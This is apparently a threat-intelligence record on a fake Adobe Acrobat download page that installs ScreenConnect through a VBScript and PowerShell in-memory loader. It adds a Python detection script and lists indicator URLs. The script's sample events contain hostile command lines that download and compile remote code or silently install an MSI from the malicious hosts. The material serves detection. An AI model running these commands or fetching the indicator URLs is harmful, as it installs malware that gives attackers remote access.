In-Memory Loader Drops ScreenConnect

April 10, 2026, 10:07 a.m.

Description

In February 2026, an attack chain was discovered that used a fraudulent Adobe Acrobat Reader download page to deceive victims into installing ConnectWise's ScreenConnect, a legitimate remote access tool abused here for malicious purposes. The attack employs sophisticated evasion techniques, including heavy obfuscation, .NET reflection for in-memory payload execution, and dynamic code construction. A VBScript loader initiates the chain by downloading and executing obfuscated PowerShell commands that compile C# code entirely in memory. The loader manipulates the Process Environment Block to masquerade as a legitimate Windows process and abuses auto-elevated COM objects to bypass User Account Control without prompting the user. This multi-layered approach evades signature-based defenses and hinders forensic analysis while ultimately deploying ScreenConnect for unauthorized remote access.
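The following is an added triage example and is not part of the original record. It walks process-creation events and flags the three observable stages the description gives: a VBScript host spawning PowerShell, PowerShell compiling code in memory, and any command line referencing the record's network indicators. The event field names mimic Sysmon Event ID 1 but are an assumption, the `Add-Type`/`CSharpCodeProvider` keywords are an assumed way of spotting in-memory C# compilation (the record only says it happens), and the sample events are constructed for the example.

```python
"""Added example, not the record's own tooling: simple detection rules for the
VBScript -> PowerShell -> in-memory C# chain summarised in the description."""
import re
from urllib.parse import urlparse

# Indicators copied from the record's "Indicators" section.
IOC_URLS = {
    "http://x0.at/qOfN.msi",
    "http://eshareflies.im/ad/",
    "https://x0.at/qOfN.msi",
}
IOC_DOMAINS = {urlparse(u).hostname for u in IOC_URLS} | {"eshareflies.im"}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Assumption: in-memory C# compilation from PowerShell usually goes through
# Add-Type or the CSharpCodeProvider; the record does not name the API used.
INMEM_COMPILE = re.compile(
    r"add-type|csharpcodeprovider|compileassemblyfromsource", re.IGNORECASE
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (event_id, reason) tuples for every rule an event matches."""
    hits = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if parent in SCRIPT_HOSTS and image in POWERSHELL:
            hits.append((ev["id"], "script host spawned PowerShell"))
        if image in POWERSHELL and INMEM_COMPILE.search(cmd):
            hits.append((ev["id"], "PowerShell compiling code in memory"))
        if any(domain in cmd.lower() for domain in IOC_DOMAINS):
            hits.append((ev["id"], "command line references record indicator"))
    return hits


# Constructed sample events (Sysmon-like field names are an assumption).
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\AcrobatReader_Setup.vbs"'},
    {"id": 2, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "$s=(iwr http://eshareflies.im/ad/).Content; Add-Type -TypeDefinition $s"'},
    {"id": 3, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i https://x0.at/qOfN.msi /qn"},
]

if __name__ == "__main__":
    for event_id, reason in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {reason}")
```

Against the constructed events, event 2 matches all three rules and event 4 matches only the indicator rule; the benign `svchost.exe` and the initial `wscript.exe` launch produce no hits. In a real deployment the parent/child rule is the durable one, since the indicator domains will rotate.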

Date

  • Created: April 10, 2026, 8:15 a.m.
  • Published: April 10, 2026, 8:15 a.m.
  • Modified: April 10, 2026, 10:07 a.m.

Indicators

  • http://x0.at/qOfN.msi
  • http://eshareflies.im/ad/
  • https://x0.at/qOfN.msi

Additional Information

  • eshareflies.im